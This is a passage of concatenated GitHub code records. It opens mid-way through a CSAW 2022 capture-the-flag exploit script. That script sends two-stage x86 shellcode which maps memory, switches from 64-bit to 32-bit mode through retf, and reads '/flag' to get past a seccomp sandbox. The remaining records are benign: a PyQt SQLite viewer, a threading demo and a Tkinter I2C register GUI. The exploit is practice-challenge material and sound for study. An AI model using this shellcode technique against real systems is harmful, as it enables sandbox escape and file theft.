: p64(data, signed='unsigned').decode(ENCODING)\nip32 = lambda data : p32(data, signed='signed').decode(ENCODING)\nip64 = lambda data : p64(data, signed='signed').decode(ENCODING)\n\nlocal = 0\nif local:\n p = process([elf.path])\n libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')\nelse:\n p = remote('how2pwn.chal.csaw.io', 60003)\n libc = ELF('./libc.so.6')\n\nticket = '8e7bd9e37e38a85551d969e29b77e1ce'\n\n#gdb.attach(p)\n\ns(ticket)\n\ncontext.arch = 'amd64'\n\nretf = b'\\xcb'\n\nsh = (\n'''\n xor rax, rax\n mov al, 0x9\n mov rdi, 0x23330000\n mov rsi, 0x4000\n mov rdx, 07\n mov r10, 0x21\n xor r8, r8\n xor r9, r9\n syscall\n''' + # SYSCALL_mmap\n'''\n xor rax, rax\n xor rdi, rdi\n mov rsi, 0x23330000\n mov rdx, 0x1000\n syscall\n''' + # SYSCALL_read\n'''\n mov eax, 0x23330000\n mov rbx, 0x2300000000\n xor rax, rbx\n push rax\n''' # push IP & CS\n)\n\np.sendlineafter(b'Enter your shellcode: \\n', asm(sh) + retf)\n\ncontext.arch = 'i386'\ncontext.bits = '32'\n\nsh = (\n'''\n mov esp, 0x23331500\n mov eax, 0x5\n push 0x67\n push 0x616c662f\n mov ebx, esp\n xor ecx, ecx\n xor edx, edx\n int 0x80\n''' + # SYSCALL_open\n'''\n mov ebx, eax\n mov al, 0x3\n mov ecx, 0x23332000\n mov edx, 0x2000\n int 0x80\n''' + # SYSCALL_read\n'''\n xor eax, eax\n mov al, 0x4\n xor ebx, ebx\n mov bl, 0x1\n int 0x80\n''' # SYSCALL_write\n)\n\ninput('@')\np.sendline(asm(sh))\n\np.interactive()\n\n","repo_name":"r4b3rt/writeups","sub_path":"CSAW-2022/how2pwn/public/bin/all/chal3.py","file_name":"chal3.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24979108055","text":"import sys\nfrom PyQt4 import QtSql, QtCore, QtGui, uic\nfrom query_courses_auto import *\n\nclass QueryCourses(QtGui.QMainWindow, Ui_MainWindow_queryCourses):\n def __init__(self, parent=None):\n QtGui.QMainWindow.__init__(self, parent)\n self.setupUi(self)\n \n db = QtSql.QSqlDatabase.addDatabase(\"QSQLITE\")\n db.setDatabaseName(\"Feedback.db\")\n db.open()\n self.loadTable()\n\n def loadTable(self):\n\n self.model = QtSql.QSqlQueryModel(self)\n query = \" select c.course_name as Course, f1.fb_text 'Feedback #1', f2.fb_text 'Feedback #2', \\\n f3.fb_text 'Feedback #3', f4.fb_text 'Feedback #4', f5.fb_text 'Feedback #5',\\\n f6.fb_text 'Feedback #6', oth_1 'Other #1', oth_2 'Other #2', oth_3 'Other #3', \\\n oth_4 'Other #4', oth_5 'Other #5' \\\n from courses c, feedback f1, feedback f2, feedback f3, feedback f4, feedback f5\\\n\t\t\t\t left outer join feedback f6 on f6.fb_id = c.fb_id6\\\n where c.fb_id1 = f1.fb_id and c.fb_id2 =f2.fb_id and c.fb_id3 = f3.fb_id and \\\n c.fb_id4 = f4.fb_id and c.fb_id5 = f5.fb_id;\"\n \n \n \n self.model.setQuery(query)\n self.tv_courses.setModel(self.model)\n self.tv_courses.setColumnWidth(0,230)\n self.tv_courses.resizeColumnsToContents()\n \nif (__name__ == \"__main__\"):\n app = QtGui.QApplication(sys.argv)\n feed = QueryCourses(None)\n feed.show()\n feed.setFixedSize(feed.size())\n app.exec_()\n","repo_name":"vivek3141/IntellitrakFeedbackTracker","sub_path":"Files/query_courses_mod.py","file_name":"query_courses_mod.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"73747844730","text":"'''\nDEVELOPER NAME : BALAVIGNESH.M\nIMPLEMENTED DATE: 16-11-2018\n'''\n\nimport threading\n\nclass SingleThread:\n\n @staticmethod\n def ExtraInfo():\n print(\"Mark Antony is the next Emprorer of the Rome\")\n\nsingle = SingleThread()\ns = threading.Thread(target = single.ExtraInfo())\ns.start()\n","repo_name":"BALAVIGNESHDOSTRIX/PyExpert","sub_path":"RunFaster/concurrency/Code-01-Single_thread_program_execution.py","file_name":"Code-01-Single_thread_program_execution.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35287069577","text":"import tkinter as tk\nfrom tkinter import *\nimport tkinter.font as tkFont\nfrom smbus import SMBus\n\n'''\ni2c GUI - change bits at certain addresses\nv1.0 \nTODOs:\nremove methods + add resuability\n'''\n\nroot = tk.Tk()\nbus = SMBus(1)\nfontStyle = tkFont.Font(family=\"Lucida Grande\", size=10)\n\ndef delete0x00():\n output_blank_0x00.delete(0, 'end')\ndef read0x00():\n\tbits = bus.read_byte_data(0x55, 0x00)\n\toutput_blank_0x00.insert(0,bin(bits))\ndef write0x00():\n\tbits = bus.read_byte_data(0x55, 0x00)\n\tentry_val = entry_0x00.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tprint(int(final,2))\n\tbus.write_byte_data(0x55, 0x00, int(final,2))\n\naddress_0x00 = tk.Label(root, text=\"0x00\")\ndescription_0x00 = tk.Label(root, text=\"bandgap\",font=fontStyle)\nentry_0x00 = tk.Entry(root, width=5)\ninput_text_0x00 = tk.Label(root, text=\"5-trimming code\",font=fontStyle)\noutput_text_0x00 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x00 = tk.Entry(root, width=10)\nread_0x00_button = tk.Button(root, text='Read', command=lambda:[delete0x00(), read0x00()])\nwrite_0x00_button = tk.Button(root, text='Write', command=write0x00)\n\naddress_0x00.grid(row=0, column=0)\ndescription_0x00.grid(row=0, column=1)\nentry_0x00.grid(row=0, column=2)\ninput_text_0x00.grid(row=1, column=2)\noutput_text_0x00.grid(row=0, column=6)\noutput_blank_0x00.grid(row=0, column=7)\nread_0x00_button.grid(row=0, column=8)\nwrite_0x00_button.grid(row=0, column=9)\n\n\ndef delete0x01():\n output_blank_0x01.delete(0, 'end')\ndef read0x01():\n\tbits = bus.read_byte_data(0x55, 0x01)\n\toutput_blank_0x01.insert(0,bin(bits))\ndef write0x01():\n\t#read_byte_data\n\tbits = bus.read_byte_data(0x55, 0x01)\n\tentry_val = entry_0x01_47.get()\n\tentry_val_2 = entry_0x01_02.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[4:5]\n\tfinal = str(entry_val) + str(keep) + str(entry_val_2)\n\tprint(int(final,2))\n\tbus.write_byte_data(0x55, 0x01, int(final,2))\n\naddress_0x01 = tk.Label(root, text=\"0x01\")\ndescription_0x01 = tk.Label(root, text=\"TIA ref and bias current\",font=fontStyle)\nentry_0x01_47 = tk.Entry(root,width=4)\nentry_0x01_02 = tk.Entry(root,width=3)\ninput_text_0x01 = tk.Label(root, text=\"4-bias control\",font=fontStyle)\ninput_text_0x01_2 = tk.Label(root, text=\"3-TIA voltage\",font=fontStyle)\noutput_text_0x01 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x01 = tk.Entry(root, width=10)\nread_0x01_button = tk.Button(root, text='Read', command=lambda:[delete0x01(), read0x01()])\nwrite_0x01_button = tk.Button(root, text='Write', command=write0x01)\n\naddress_0x01.grid(row=2, column=0)\ndescription_0x01.grid(row=2, column=1)\nentry_0x01_47.grid(row=2, column=2)\nentry_0x01_02.grid(row=2, column=3)\ninput_text_0x01.grid(row=3, column=2)\ninput_text_0x01_2.grid(row=3,column=3)\noutput_text_0x01.grid(row=2, column=6)\noutput_blank_0x01.grid(row=2, column=7)\nread_0x01_button.grid(row=2, column=8)\nwrite_0x01_button.grid(row=2, column=9)\n\n\ndef delete0x02():\n output_blank_0x02.delete(0, 'end')\ndef read0x02():\n\tbits = bus.read_byte_data(0x55, 0x02)\n\toutput_blank_0x02.insert(0,bin(bits))\ndef write0x02():\n\tbits = bus.read_byte_data(0x55, 0x02)\n\tentry_val = entry_0x02_6.get()\n\tentry_val_2 = entry_0x02_5.get()\n\tentry_val_3 = entry_0x02_4.get()\n\tentry_val_4 = entry_0x02_02.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:1]\n\tkeep1 = format(int(bits), \"b\")\n\tkeep1 = keep1[4:5]\n\tfinal = str(keep) + str(entry_val) + str(entry_val_2) + str(entry_val_3) + str(keep1) + str(entry_val_4)\n\tprint(int(final,2))\n\tbus.write_byte_data(0x55, 0x02, int(final,2))\n\naddress_0x02 = tk.Label(root, text=\"0x02\")\ndescription_0x02 = tk.Label(root, text=\"VDD12 ref\",font=fontStyle)\nentry_0x02_6 = tk.Entry(root,width=1)\nentry_0x02_5 = tk.Entry(root,width=1)\nentry_0x02_4 = tk.Entry(root,width=1)\nentry_0x02_02 = tk.Entry(root,width=3)\ninput_text_0x02 = tk.Label(root, text=\"1-LEDDRV_PD\",font=fontStyle)\ninput_text_0x02_2 = tk.Label(root, text=\"1-LED PD\",font=fontStyle)\ninput_text_0x02_3 = tk.Label(root, text=\"1-TIA_PD\",font=fontStyle)\ninput_text_0x02_4 = tk.Label(root, text=\"3-VDD12 REF\",font=fontStyle)\noutput_text_0x02 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x02 = tk.Entry(root, width=10)\nread_0x02_button = tk.Button(root, text='Read', command=lambda:[delete0x02(), read0x02()])\nwrite_0x02_button = tk.Button(root, text='Write', command=write0x02)\n\naddress_0x02.grid(row=4, column=0)\ndescription_0x02.grid(row=4, column=1)\nentry_0x02_6.grid(row=4, column=2)\nentry_0x02_5.grid(row=4, column=3)\nentry_0x02_4.grid(row=4, column=4)\nentry_0x02_02.grid(row=4, column=5)\ninput_text_0x02.grid(row=5, column=2)\ninput_text_0x02_2.grid(row=5, column=3)\ninput_text_0x02_3.grid(row=5, column=4)\ninput_text_0x02_4.grid(row=5, column=5)\noutput_text_0x02.grid(row=4, column=6)\noutput_blank_0x02.grid(row=4, column=7)\nread_0x02_button.grid(row=4,column=8)\nwrite_0x02_button.grid(row=4, column=9)\n\ndef delete0x03():\n output_blank_0x03.delete(0, 'end')\ndef read0x03():\n\tbits = bus.read_byte_data(0x55, 0x03)\n\toutput_blank_0x03.insert(0,bin(bits))\ndef write0x03():\n\tbits = bus.read_byte_data(0x55, 0x03)\n\tentry_val = entry_0x03_57.get()\n\tentry_val_2 = entry_0x03_04.get()\n\tfinal = str(entry_val) + str(entry_val_2)\n\tbus.write_byte_data(0x55, 0x03, int(final,2))\n\naddress_0x03 = tk.Label(root, text=\"0x03\")\ndescription_0x03 = tk.Label(root, text=\"offset cancellation ref\",font=fontStyle)\nentry_0x03_57 = tk.Entry(root,width=3)\nentry_0x03_04 = tk.Entry(root,width=5)\ninput_text_0x03 = tk.Label(root, text=\"3-o.c swing\",font=fontStyle)\ninput_text_0x03_2 = tk.Label(root, text=\"5-o.c ref ctrl\",font=fontStyle)\noutput_text_0x03 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x03 = tk.Entry(root, width=10)\nread_0x03_button = tk.Button(root, text='Read', command=lambda:[delete0x03(), read0x03()])\nwrite_0x03_button = tk.Button(root, text='Write', command=write0x03)\n\naddress_0x03.grid(row=6, column=0)\ndescription_0x03.grid(row=6, column=1)\nentry_0x03_57.grid(row=6, column=2)\nentry_0x03_04.grid(row=6, column=3)\ninput_text_0x03.grid(row=7, column=2)\ninput_text_0x03_2.grid(row=7,column=3)\noutput_text_0x03.grid(row=6, column=6)\noutput_blank_0x03.grid(row=6, column=7)\nread_0x03_button.grid(row=6, column=8)\nwrite_0x03_button.grid(row=6, column=9)\n\ndef delete0x04():\n output_blank_0x04.delete(0, 'end')\ndef read0x04():\n\tbits = bus.read_byte_data(0x55, 0x04)\n\toutput_blank_0x04.insert(0,bin(bits))\ndef write0x04():\n\tbits = bus.read_byte_data(0x55, 0x04)\n\tentry_val = entry_0x04_3.get()\n\tentry_val_2 = entry_0x04_02.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:4]\n\tfinal = str(keep) + str(entry_val) + str(entry_val_2)\n\tbus.write_byte_data(0x55, 0x04, int(final,2))\n\naddress_0x04 = tk.Label(root, text=\"0x04\")\ndescription_0x04 = tk.Label(root, text=\"\")\nentry_0x04_3 = tk.Entry(root,width=1)\nentry_0x04_02 = tk.Entry(root,width=3)\ninput_text_0x04 = tk.Label(root, text=\"1-freeze\",font=fontStyle)\ninput_text_0x04_2 = tk.Label(root, text=\"3-o.c gain\",font=fontStyle)\noutput_text_0x04 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x04 = tk.Entry(root, width=10)\nread_0x04_button = tk.Button(root, text='Read', command=lambda:[delete0x04(), read0x04()])\nwrite_0x04_button = tk.Button(root, text='Write', command=write0x04)\n\naddress_0x04.grid(row=8, column=0)\ndescription_0x04.grid(row=8, column=1)\nentry_0x04_3.grid(row=8, column=2)\nentry_0x04_02.grid(row=8, column=3)\ninput_text_0x04.grid(row=9, column=2)\ninput_text_0x04_2.grid(row=9,column=3)\noutput_text_0x04.grid(row=8, column=6)\noutput_blank_0x04.grid(row=8, column=7)\nread_0x04_button.grid(row=8, column=8)\nwrite_0x04_button.grid(row=8, column=9)\n\ndef delete0x05():\n output_blank_0x05.delete(0, 'end')\ndef read0x05():\n\tbits = bus.read_byte_data(0x55, 0x05)\n\toutput_blank_0x05.insert(0,bin(bits))\ndef write0x05():\n\tbits = bus.read_byte_data(0x55, 0x05)\n\tentry_val = entry_0x05_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x05, int(final,2))\n\naddress_0x05 = tk.Label(root, text=\"0x05\")\ndescription_0x05 = tk.Label(root, text=\"\")\nentry_0x05_04 = tk.Entry(root,width=5)\ninput_text_0x05 = tk.Label(root, text=\"5-o.c max\",font=fontStyle)\noutput_text_0x05 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x05 = tk.Entry(root, width=10)\nread_0x05_button = tk.Button(root, text='Read', command=lambda:[delete0x05(), read0x05()])\n\naddress_0x05.grid(row=10, column=0)\ndescription_0x05.grid(row=10, column=1)\nentry_0x05_04.grid(row=10, column=2)\ninput_text_0x05.grid(row=11, column=2)\noutput_text_0x05.grid(row=10, column=6)\noutput_blank_0x05.grid(row=10, column=7)\nread_0x05_button.grid(row=10, column=8)\n\ndef delete0x06():\n output_blank_0x06.delete(0, 'end')\ndef read0x06():\n\tbits = bus.read_byte_data(0x55, 0x06)\n\toutput_blank_0x06.insert(0,bin(bits))\ndef write0x06():\n\tbits = bus.read_byte_data(0x55, 0x06)\n\tentry_val = entry_0x06_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x06, int(final,2))\n\naddress_0x06 = tk.Label(root, text=\"0x06\")\ndescription_0x06 = tk.Label(root, text=\"\")\nentry_0x06_04 = tk.Entry(root,width=5)\ninput_text_0x06 = tk.Label(root, text=\"5-o.c min\",font=fontStyle)\noutput_text_0x06 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x06 = tk.Entry(root, width=10)\nread_0x06_button = tk.Button(root, text='Read', command=lambda:[delete0x06(), read0x06()])\n\naddress_0x06.grid(row=12, column=0)\ndescription_0x06.grid(row=12, column=1)\nentry_0x06_04.grid(row=12, column=2)\ninput_text_0x06.grid(row=13, column=2)\noutput_text_0x06.grid(row=12, column=6)\noutput_blank_0x06.grid(row=12, column=7)\nread_0x06_button.grid(row=12, column=8)\n\ndef delete0x07():\n output_blank_0x07.delete(0, 'end')\ndef read0x07():\n\tbits = bus.read_byte_data(0x55, 0x07)\n\toutput_blank_0x07.insert(0,bin(bits))\ndef write0x07():\n\tbits = bus.read_byte_data(0x55, 0x07)\n\tentry_val = entry_0x07_07.get()\n\tfinal = str(entry_val)\n\tbus.write_byte_data(0x55, 0x07, int(final,2))\n\naddress_0x07 = tk.Label(root, text=\"0x07\")\ndescription_0x07 = tk.Label(root, text=\"\")\nentry_0x07_07 = tk.Entry(root,width=8)\ninput_text_0x07 = tk.Label(root, text=\"8-o.c channel monitored\",font=fontStyle)\noutput_text_0x07 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x07 = tk.Entry(root, width=10)\nread_0x07_button = tk.Button(root, text='Read', command=lambda:[delete0x07(), read0x07()])\nwrite_0x07_button = tk.Button(root, text='Write', command=write0x07)\n\naddress_0x07.grid(row=14, column=0)\ndescription_0x07.grid(row=14, column=1)\nentry_0x07_07.grid(row=14, column=2)\ninput_text_0x07.grid(row=15, column=2)\noutput_text_0x07.grid(row=14, column=6)\noutput_blank_0x07.grid(row=14, column=7)\nread_0x07_button.grid(row=14, column=8)\nwrite_0x07_button.grid(row=14, column=9)\n\ndef delete0x08():\n output_blank_0x08.delete(0, 'end')\ndef read0x08():\n\tbits = bus.read_byte_data(0x55, 0x08)\n\toutput_blank_0x08.insert(0,bin(bits))\ndef write0x08():\n\tbits = bus.read_byte_data(0x55, 0x08)\n\tentry_val = entry_0x08_6.get()\n\tentry_val_2 = entry_0x08_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:1]\n\tkeep1 = format(int(bits), \"b\")\n\tkeep1 = keep1[2:3]\n\tfinal = str(keep) + str(entry_val) + str(keep1) + str(entry_val_2)\n\tbus.write_byte_data(0x55, 0x08, int(final,2))\n\naddress_0x08 = tk.Label(root, text=\"0x08\")\ndescription_0x08 = tk.Label(root, text=\"\")\nentry_0x08_6 = tk.Entry(root,width=1)\nentry_0x08_04 = tk.Entry(root,width=5)\ninput_text_0x08 = tk.Label(root, text=\"1-global lock\",font=fontStyle)\ninput_text_0x08_2 = tk.Label(root, text=\"5-o.c DAC level\",font=fontStyle)\noutput_text_0x08 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x08 = tk.Entry(root, width=10)\nread_0x08_button = tk.Button(root, text='Read', command=lambda:[delete0x08(), read0x08()])\n\naddress_0x08.grid(row=16, column=0)\ndescription_0x08.grid(row=16, column=1)\nentry_0x08_6.grid(row=16, column=2)\nentry_0x08_04.grid(row=16, column=3)\ninput_text_0x08.grid(row=17, column=2)\ninput_text_0x08_2.grid(row=17, column=3)\noutput_text_0x08.grid(row=16, column=6)\noutput_blank_0x08.grid(row=16, column=7)\nread_0x08_button.grid(row=16, column=8)\n\ndef delete0x09():\n output_blank_0x09.delete(0, 'end')\ndef read0x09():\n\tbits = bus.read_byte_data(0x55, 0x09)\n\toutput_blank_0x09.insert(0,bin(bits))\ndef write0x09():\n\tbits = bus.read_byte_data(0x55, 0x09)\n\tentry_val = entry_0x09_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x09, int(final,2))\n\naddress_0x09 = tk.Label(root, text=\"0x09\")\ndescription_0x09 = tk.Label(root, text=\"\")\nentry_0x09_04 = tk.Entry(root,width=5)\ninput_text_0x09 = tk.Label(root, text=\"5-o.c DAC override\",font=fontStyle)\noutput_text_0x09 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x09 = tk.Entry(root, width=10)\nread_0x09_button = tk.Button(root, text='Read', command=lambda:[delete0x09(), read0x09()])\nwrite_0x09_button = tk.Button(root, text='Write', command=write0x09)\n\naddress_0x09.grid(row=18, column=0)\ndescription_0x09.grid(row=18, column=1)\nentry_0x09_04.grid(row=18, column=2)\ninput_text_0x09.grid(row=19, column=2)\noutput_text_0x09.grid(row=18, column=6)\noutput_blank_0x09.grid(row=18, column=7)\nread_0x09_button.grid(row=18, column=8)\nwrite_0x09_button.grid(row=18, column=9)\n\ndef delete0x0A():\n output_blank_0x0A.delete(0, 'end')\ndef read0x0A():\n\tbits = bus.read_byte_data(0x55, 0x0A)\n\toutput_blank_0x0A.insert(0,bin(bits))\ndef write0x0A():\n\tbits = bus.read_byte_data(0x55, 0x0A)\n\tentry_val = entry_0x0A_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x0A, int(final,2))\n\naddress_0x0A = tk.Label(root, text=\"0x0A\")\ndescription_0x0A = tk.Label(root, text=\"LED CONTROL\",font=fontStyle)\nentry_0x0A_04 = tk.Entry(root,width=5)\ninput_text_0x0A = tk.Label(root, text=\"5-LED BIAS\",font=fontStyle)\noutput_text_0x0A = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x0A = tk.Entry(root, width=10)\nread_0x0A_button = tk.Button(root, text='Read', command=lambda:[delete0x0A(), read0x0A()])\nwrite_0x0A_button = tk.Button(root, text='Write', command=write0x0A)\n\naddress_0x0A.grid(row=20, column=0)\ndescription_0x0A.grid(row=20, column=1)\nentry_0x0A_04.grid(row=20, column=2)\ninput_text_0x0A.grid(row=21, column=2)\noutput_text_0x0A.grid(row=20, column=6)\noutput_blank_0x0A.grid(row=20, column=7)\nread_0x0A_button.grid(row=20, column=8)\nwrite_0x0A_button.grid(row=20, column=9)\n\ndef delete0x0B():\n output_blank_0x0B.delete(0, 'end')\ndef read0x0B():\n\tbits = bus.read_byte_data(0x55, 0x0B)\n\toutput_blank_0x0B.insert(0,bin(bits))\ndef write0x0B():\n\tbits = bus.read_byte_data(0x55, 0x0B)\n\tentry_val = entry_0x0B_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x0B, int(final,2))\n\naddress_0x0B = tk.Label(root, text=\"0x0B\")\ndescription_0x0B = tk.Label(root, text=\"\")\nentry_0x0B_04 = tk.Entry(root,width=5)\ninput_text_0x0B = tk.Label(root, text=\"5-LED MOD\",font=fontStyle)\noutput_text_0x0B = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x0B = tk.Entry(root, width=10)\nread_0x0B_button = tk.Button(root, text='Read', command=lambda:[delete0x0B(), read0x0B()])\nwrite_0x0B_button = tk.Button(root, text='Write', command=write0x0B)\n\naddress_0x0B.grid(row=22, column=0)\ndescription_0x0B.grid(row=22, column=1)\nentry_0x0B_04.grid(row=22, column=2)\ninput_text_0x0B.grid(row=23, column=2)\noutput_text_0x0B.grid(row=22, column=6)\noutput_blank_0x0B.grid(row=22, column=7)\nread_0x0B_button.grid(row=22, column=8)\nwrite_0x0B_button.grid(row=22, column=9)\n\ndef delete0x0C():\n output_blank_0x0C.delete(0, 'end')\ndef read0x0C():\n\tbits = bus.read_byte_data(0x55, 0x0C)\n\toutput_blank_0x0C.insert(0,bin(bits))\ndef write0x0C():\n\tbits = bus.read_byte_data(0x55, 0x0C)\n\tentry_val = entry_0x0C_01.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:6]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x0C, int(final,2))\n\naddress_0x0C = tk.Label(root, text=\"0x0C\")\ndescription_0x0C = tk.Label(root, text=\"\")\nentry_0x0C_01 = tk.Entry(root,width=2)\ninput_text_0x0C = tk.Label(root, text=\"2-LED boost\",font=fontStyle)\noutput_text_0x0C = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x0C = tk.Entry(root, width=10)\nread_0x0C_button = tk.Button(root, text='Read', command=lambda:[delete0x0C(), read0x0C()])\nwrite_0x0C_button = tk.Button(root, text='Write', command=write0x0C)\n\naddress_0x0C.grid(row=24, column=0)\ndescription_0x0C.grid(row=24, column=1)\nentry_0x0C_01.grid(row=24, column=2)\ninput_text_0x0C.grid(row=25, column=2)\noutput_text_0x0C.grid(row=24, column=6)\noutput_blank_0x0C.grid(row=24, column=7)\nread_0x0C_button.grid(row=24, column=8)\nwrite_0x0C_button.grid(row=24, column=9)\n\ndef delete0x0D():\n output_blank_0x0D.delete(0, 'end')\ndef read0x0D():\n\tbits = bus.read_byte_data(0x55, 0x0D)\n\toutput_blank_0x0D.insert(0,bin(bits))\ndef write0x0D():\n\tbits = bus.read_byte_data(0x55, 0x0D)\n\tentry_val = entry_0x0D_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x0D, int(final,2))\n\naddress_0x0D = tk.Label(root, text=\"0x0D\")\ndescription_0x0D = tk.Label(root, text=\"\")\nentry_0x0D_04 = tk.Entry(root,width=5)\ninput_text_0x0D = tk.Label(root, text=\"5-Input signal reference\",font=fontStyle)\noutput_text_0x0D = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x0D = tk.Entry(root, width=10)\nread_0x0D_button = tk.Button(root, text='Read', command=lambda:[delete0x0D(), read0x0D()])\nwrite_0x0D_button = tk.Button(root, text='Write', command=write0x0D)\n\naddress_0x0D.grid(row=26, column=0)\ndescription_0x0D.grid(row=26, column=1)\nentry_0x0D_04.grid(row=26, column=2)\ninput_text_0x0D.grid(row=27, column=2)\noutput_text_0x0D.grid(row=26, column=6)\noutput_blank_0x0D.grid(row=26, column=7)\nread_0x0D_button.grid(row=26, column=8)\nwrite_0x0D_button.grid(row=26, column=9)\n\ndef delete0x0E():\n output_blank_0x0E.delete(0, 'end')\ndef read0x0E():\n\tbits = bus.read_byte_data(0x55, 0x0E)\n\toutput_blank_0x0E.insert(0,bin(bits))\ndef write0x0E():\n\tbits = bus.read_byte_data(0x55, 0x0E)\n\tentry_val = entry_0x0E_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x0E, int(final,2))\n\naddress_0x0E = tk.Label(root, text=\"0x0E\")\ndescription_0x0E = tk.Label(root, text=\"\")\nentry_0x0E_04 = tk.Entry(root,width=5)\ninput_text_0x0E = tk.Label(root, text=\"5-Common Mod Ref\",font=fontStyle)\noutput_text_0x0E = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x0E = tk.Entry(root, width=10)\nread_0x0E_button = tk.Button(root, text='Read', command=lambda:[delete0x0E(), read0x0E()])\nwrite_0x0E_button = tk.Button(root, text='Write', command=write0x0E)\n\naddress_0x0E.grid(row=28, column=0)\ndescription_0x0E.grid(row=28, column=1)\nentry_0x0E_04.grid(row=28, column=2)\ninput_text_0x0E.grid(row=29, column=2)\noutput_text_0x0E.grid(row=28, column=6)\noutput_blank_0x0E.grid(row=28, column=7)\nread_0x0E_button.grid(row=28, column=8)\nwrite_0x0E_button.grid(row=28, column=9)\n\ndef delete0x0F():\n output_blank_0x0F.delete(0, 'end')\ndef read0x0F():\n\tbits = bus.read_byte_data(0x55, 0x0F)\n\toutput_blank_0x0F.insert(0,bin(bits))\ndef write0x0F():\n\tbits = bus.read_byte_data(0x55, 0x0F)\n\tentry_val = entry_0x0F_76.get()\n\tentry_val_2 = entry_0x0F_53.get()\n\tentry_val_3 = entry_0x0F_21.get()\n\tentry_val_4 = entry_0x0F_0.get()\n\tfinal = str(entry_val) + str(entry_val_2) + str(entry_val_3) + str(entry_val_4)\n\tbus.write_byte_data(0x55, 0x0F, int(final,2))\n\naddress_0x0F = tk.Label(root, text=\"0x0F\")\ndescription_0x0F = tk.Label(root, text=\"\")\nentry_0x0F_76 = tk.Entry(root,width=2)\nentry_0x0F_53 = tk.Entry(root,width=3)\nentry_0x0F_21 = tk.Entry(root,width=2)\nentry_0x0F_0 = tk.Entry(root,width=1)\ninput_text_0x0F = tk.Label(root, text=\"2-spare bits\",font=fontStyle)\ninput_text_0x0F_2 = tk.Label(root, text=\"3-test_mux8\",font=fontStyle)\ninput_text_0x0F_22 = tk.Label(root, text=\"\\n0-nothing\\n1-REFH\\n2-REFL\\n3-compref\\n4-VDD12ref\\n5-DAC1INN\\n6-DACINP\\n7-VOCMFP\",font=fontStyle)\ninput_text_0x0F_3 = tk.Label(root, text=\"2-test_mux\",font=fontStyle)\ninput_text_0x0F_33 = tk.Label(root, text=\"\\n0-TIA REF\\n1-VBIAS18\",font=fontStyle)\ninput_text_0x0F_4 = tk.Label(root, text=\"1-Protect LED driver\",font=fontStyle)\noutput_text_0x0F = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x0F = tk.Entry(root, width=10)\nread_0x0F_button = tk.Button(root, text='Read', command=lambda:[delete0x0F(), read0x0F()])\nwrite_0x0F_button = tk.Button(root, text='Write', command=write0x0F)\n\naddress_0x0F.grid(row=30, column=0)\ndescription_0x0F.grid(row=30, column=1)\nentry_0x0F_76.grid(row=30, column=2)\nentry_0x0F_53.grid(row=30, column=3)\nentry_0x0F_21.grid(row=30, column=4)\nentry_0x0F_0.grid(row=30, column=5)\ninput_text_0x0F.grid(row=31, column=2)\ninput_text_0x0F_2.grid(row=31, column=3)\ninput_text_0x0F_3.grid(row=31, column=4)\ninput_text_0x0F_22.grid(row=32, column=3)\ninput_text_0x0F_33.grid(row=32, column=4)\ninput_text_0x0F_4.grid(row=31, column=5)\noutput_text_0x0F.grid(row=30, column=6)\noutput_blank_0x0F.grid(row=30, column=7)\nread_0x0F_button.grid(row=30, column=8)\nwrite_0x0F_button.grid(row=30, column=9)\n\n\nroot.mainloop()\n\n","repo_name":"satselikov/gui","sub_path":"extra/i2c.py","file_name":"i2c.py","file_ext":"py","file_size_in_byte":21268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74259740408","text":"from data.vocabulary import vocab\nfrom data.raw_data import 